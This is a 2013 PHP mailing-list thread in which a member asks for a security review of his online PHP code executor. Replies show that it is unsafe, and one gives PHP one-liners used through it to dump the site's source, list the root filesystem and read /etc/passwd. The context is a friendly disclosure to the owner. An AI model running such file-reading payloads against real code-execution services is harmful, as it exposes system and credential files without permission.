I was able to write a (harmless) file to your filesystem... not ideal! +1 for taking it down ASAP.
On Wed, Jul 3, 2013 at 10:08 PM, David Neilsen <[email protected]> wrote: > Short answer is no way. > > In my few minutes of playing I made it output your code: > echo > "<pre>";var_dump(htmlentities(file_get_contents("/home/code1/public_html/PHP/exec.php"))); > > Read your file system: > echo "<pre>";var_dump(glob("/*")); > > Even read your password file: > echo "<pre>";var_dump(file_get_contents("/etc/passwd")); > > You should take this down right now! > > David Neilsen | 07 834 3366 | PANmedia ® > > > On Wed, Jul 3, 2013 at 7:03 PM, chirag sharma < > [email protected]> wrote: > >> I have created an online PHP code executor at http://web.guru99.com >> >> Though I have checked all security aspects … do you experts see any major >> flaw that I need to care of? >> >> -- >> -- >> NZ PHP Users Group: http://groups.google.com/group/nzphpug >> To post, send email to [email protected] >> To unsubscribe, send email to >> [email protected] >> --- >> You received this message because you are subscribed to the Google Groups >> "NZ PHP Users Group" group. >> To unsubscribe from this group and stop receiving emails from it, send an >> email to [email protected]. >> For more options, visit https://groups.google.com/groups/opt_out. >> >> >> > > -- > -- > NZ PHP Users Group: http://groups.google.com/group/nzphpug > To post, send email to [email protected] > To unsubscribe, send email to > [email protected] > --- > You received this message because you are subscribed to the Google Groups > "NZ PHP Users Group" group. > To unsubscribe from this group and stop receiving emails from it, send an > email to [email protected]. > For more options, visit https://groups.google.com/groups/opt_out. > > > -- -- NZ PHP Users Group: http://groups.google.com/group/nzphpug To post, send email to [email protected] To unsubscribe, send email to [email protected] --- You received this message because you are subscribed to the Google Groups "NZ PHP Users Group" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. For more options, visit https://groups.google.com/groups/opt_out.
